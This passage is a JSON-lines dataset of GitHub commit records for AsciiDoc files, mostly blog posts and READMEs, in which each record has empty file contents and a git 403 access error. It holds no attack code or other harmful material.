_posts\/2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03397e1e120eede58fcb2b4c2c9dde6e9ba8278a","subject":"Update 2017-05-28.adoc","message":"Update 2017-05-28.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28.adoc","new_file":"_posts\/2017-05-28.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2daae0307baaf3badc1ecae08c091e56252709b","subject":"Update 2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","message":"Update 2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","new_file":"_posts\/2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc1a35314ae0f276e5c058768b75278c54b7cd42","subject":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f25e58a2573e7df4fa2a2004b45318916028b630","subject":"[DOCS] Add 'remote clusters' requirement link to CCR docs (#47185)","message":"[DOCS] Add 'remote clusters' requirement link to CCR docs (#47185)\n\n","repos":"coding0011\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/ccr\/overview.asciidoc","new_file":"docs\/reference\/ccr\/overview.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a5f6d076fa2193f12c93e6561ebad613ed663d","subject":"Revert: Deleted _posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","message":"Revert: Deleted _posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc\n","repos":"sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io","old_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sskorol\/sskorol.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6154da28ba788bf55520a05117f7a23d5ea26c47","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc8ee3b292256b2e21f43aa39752bb5865d9a8b0","subject":"Update 2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","message":"Update 2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","repos":"srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io","old_file":"_posts\/2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","new_file":"_posts\/2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srevereault\/srevereault.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ae9eaa69b94d3afc6089d2609eb250bd2a84695","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98d1e15a4909571a305b2136e486ad094c928ec3","subject":"y2b create post VIDEO GAME KNIVES IN REAL LIFE","message":"y2b create post VIDEO GAME KNIVES IN REAL LIFE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-16-VIDEO-GAME-KNIVES-IN-REAL-LIFE.adoc","new_file":"_posts\/2016-06-16-VIDEO-GAME-KNIVES-IN-REAL-LIFE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce9f4c41e3137f113521b16a298569d4e74077dd","subject":"Update 2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","message":"Update 2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","new_file":"_posts\/2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"311d6a0f873fabb80d470417a142d298839cef72","subject":"y2b create post Skyward Sword Winner \\u0026 My CES Trip","message":"y2b create post Skyward Sword Winner \\u0026 My CES Trip","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-03-Skyward-Sword-Winner-u0026-My-CES-Trip.adoc","new_file":"_posts\/2012-01-03-Skyward-Sword-Winner-u0026-My-CES-Trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48569f10b995b00360b45ef05e44df359f9fbc48","subject":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","message":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d4e5e36b39c8e0ceb3ea18f8f013c263415d53","subject":"Update readme","message":"Update readme\n","repos":"tschulte\/griffon,levymoreira\/griffon,tschulte\/griffon,levymoreira\/griffon,levymoreira\/griffon,tschulte\/griffon,griffon\/griffon,griffon\/griffon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tschulte\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eceeab50ab797a160cf0b9b7e92ce2a19fdebace","subject":"README: forgot `make`","message":"README: forgot `make`\n","repos":"Somasis\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Somasis\/scripts.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"575463fa6caa6522029497a172e0b2685838e522","subject":"update README","message":"update README\n","repos":"ozlerhakan\/poiji,ozlerhakan\/poiji","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ozlerhakan\/poiji.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5255384f931a05e868dbb81fcee288995a370d20","subject":"problem: not clear how to start contributing","message":"problem: not clear how to start contributing\n\nIt's confusing for new contributors to get started even after reading the C4.\r\n \r\nsolution: add FAQ template from Blockrazor as a starting point for actions that new contributors should take.","repos":"sjmackenzie\/fractalide,fractalide\/fractalide,fractalide\/fractalide,dmichiels\/fractalide,sjmackenzie\/fractalide,fractalide\/fractalide,dmichiels\/fractalide,dmichiels\/fractalide,sjmackenzie\/fractalide","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fractalide\/fractalide.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"6de98f5680930f342df707bec3b3c51f4ee14955","subject":"documents","message":"documents\n","repos":"crabzilla\/crabzilla","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crabzilla\/crabzilla.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"777b55e733c4d53830beead20e22de5677efdc37","subject":"Update 2011-10-04-Day-one-Technical-Keynote.adoc","message":"Update 2011-10-04-Day-one-Technical-Keynote.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2011-10-04-Day-one-Technical-Keynote.adoc","new_file":"_posts\/2011-10-04-Day-one-Technical-Keynote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f19f18a73704643eeffc69265fb804a8a3d2aa7","subject":"Update 2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","message":"Update 2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","new_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6b9ba77214e021f3aca5c477cd93db588b1c21d","subject":"Adding 1.0 CR1 release announcement","message":"Adding 1.0 CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-12-12-debezium-1-0-0-cr1-released.adoc","new_file":"blog\/2019-12-12-debezium-1-0-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e7ed3b18607599c240ec70bdbf1acd43792b036","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d1734649116a454a65022bad4e8185bc54c51d7","subject":"Update 2015-07-29-Farewell-to-Google-Code.adoc","message":"Update 2015-07-29-Farewell-to-Google-Code.adoc","repos":"ciptard\/ciptard.github.io,ciptard\/ciptard.github.io,ciptard\/ciptard.github.io","old_file":"_posts\/2015-07-29-Farewell-to-Google-Code.adoc","new_file":"_posts\/2015-07-29-Farewell-to-Google-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciptard\/ciptard.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31dc7a7cabfe50ff2353b4641628973fe1dfc5c2","subject":"Update 2017-10-11.adoc","message":"Update 2017-10-11.adoc","repos":"uskithub\/uskithub.github.io,uskithub\/uskithub.github.io,uskithub\/uskithub.github.io,uskithub\/uskithub.github.io","old_file":"_posts\/2017-10-11.adoc","new_file":"_posts\/2017-10-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uskithub\/uskithub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfdb885785918bba410c67219756de4b743d2da4","subject":"Create README.adoc","message":"Create README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/icmp_reply\/README.adoc","new_file":"examples\/icmp_reply\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b28acbb3fe9fc36db7e67a47ca82fb648b04296","subject":"Update 2019-03-19-Backup-Menggunakan-Gdrive.adoc","message":"Update 2019-03-19-Backup-Menggunakan-Gdrive.adoc","repos":"anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io","old_file":"_posts\/2019-03-19-Backup-Menggunakan-Gdrive.adoc","new_file":"_posts\/2019-03-19-Backup-Menggunakan-Gdrive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anggadjava\/anggadjava.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d4d8eb2bb51037556d39d30c8c1fba3ae364db8","subject":"Update 2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","message":"Update 2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","repos":"dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io","old_file":"_posts\/2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","new_file":"_posts\/2019-08-12-el-Clubo-Ahora-asi-suenan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgrizzla\/dgrizzla.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c57f565720f19703766a5d7408f79d7378b79c0","subject":"Update 2015-02-21-puppetlabs-aptnext.adoc","message":"Update 2015-02-21-puppetlabs-aptnext.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-21-puppetlabs-aptnext.adoc","new_file":"_posts\/2015-02-21-puppetlabs-aptnext.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d11762346c7a4800da2853338432a43a57352ab","subject":"Update 2017-08-25-Thrasos-Code-Snips.adoc","message":"Update 2017-08-25-Thrasos-Code-Snips.adoc","repos":"thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io","old_file":"_posts\/2017-08-25-Thrasos-Code-Snips.adoc","new_file":"_posts\/2017-08-25-Thrasos-Code-Snips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrasos\/thrasos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80789ac127f451584db71506bc99586d5a159d74","subject":"Update 2015-01-19-Need-More-Coffee.adoc","message":"Update 2015-01-19-Need-More-Coffee.adoc","repos":"tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io","old_file":"_posts\/2015-01-19-Need-More-Coffee.adoc","new_file":"_posts\/2015-01-19-Need-More-Coffee.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485009b407674b8a4a57d3aa1f19ebe507d0c46a","subject":"Publish 2016-6-29-PHP-CSV.adoc","message":"Publish 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHP-CSV.adoc","new_file":"2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4bb8eab5f8616dccb681051a99988ac5adf45f5","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e3fcbd3019bf04d029c58eb404dda60bf43ba33","subject":"Update 2017-01-21-Swap-Numbers.adoc","message":"Update 2017-01-21-Swap-Numbers.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d935cb98bbb12fee93ba9271b875ea3e9fb521","subject":"Update 2019-01-31-till20170307.adoc","message":"Update 2019-01-31-till20170307.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2019-01-31-till20170307.adoc","new_file":"_posts\/2019-01-31-till20170307.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e464f33c2534f2e27f7aac9c1afdba9af5055b7f","subject":"job: #11745 first draft design note","message":"job: #11745 first draft design note\n","repos":"keithbrown\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,keithbrown\/mc,cortlandstarrett\/mc,rmulvey\/mc,keithbrown\/mc,rmulvey\/mc,keithbrown\/mc,xtuml\/mc,keithbrown\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,lwriemen\/mc,keithbrown\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc","old_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_dnt.adoc","new_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_dnt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1956e813eae7156328931adaf4a17c8509126f9e","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d0233c68f58ef26b0f4ee0d36729885777788bc","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d0c5b68adf388e5189aed3f9f90eb51c4a38d4d","subject":"emphasize storage","message":"emphasize storage\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"overview.adoc","new_file":"overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce27be060fc856b78dfe8b324e2532f8b1d07f5c","subject":"Add README.","message":"Add README.\n","repos":"zeroleaf\/com.zeroleaf,zeroleaf\/com.zeroleaf","old_file":"ProgressBar\/README.adoc","new_file":"ProgressBar\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zeroleaf\/com.zeroleaf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b07eca4bda30cb67d19512485a0ed68e95d6d1de","subject":"Testing adoc","message":"Testing adoc\n","repos":"okaram\/IntroJava,okaram\/IntroJava,okaram\/IntroJava","old_file":"first.adoc","new_file":"first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/okaram\/IntroJava.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f00d0a2b4b65a468e2e5ffbbd32b958a071cad4b","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe17cbcca2a4e9f7734bf25dffb072c61e9cb074","subject":"ConnectX-4 support","message":"ConnectX-4 support\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9d6126267717fb7b69ead47c8743362f25bf2c8","subject":"Update 2016-06-07-Powitanie-cel-bloga.adoc","message":"Update 2016-06-07-Powitanie-cel-bloga.adoc","repos":"pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/g2zory,pzmarzly\/g2zory,pzmarzly\/g2zory,pzmarzly\/pzmarzly.github.io,pzmarzly\/pzmarzly.github.io","old_file":"_posts\/2016-06-07-Powitanie-cel-bloga.adoc","new_file":"_posts\/2016-06-07-Powitanie-cel-bloga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pzmarzly\/pzmarzly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"511ebbce11d9e5d53a80af9eb1a2f8558618f8ee","subject":"Update 2017-01-13-memo-like-Ascii-Doc.adoc","message":"Update 2017-01-13-memo-like-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-Ascii-Doc.adoc","new_file":"_posts\/2017-01-13-memo-like-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff594a0057568f0c1bcef2f7496cdef90f7dd400","subject":"Update 2017-06-20-Mostly-About-Trials.adoc","message":"Update 2017-06-20-Mostly-About-Trials.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-06-20-Mostly-About-Trials.adoc","new_file":"_posts\/2017-06-20-Mostly-About-Trials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ab1da3b84824f345bea31828d894d8484b25623","subject":"Update 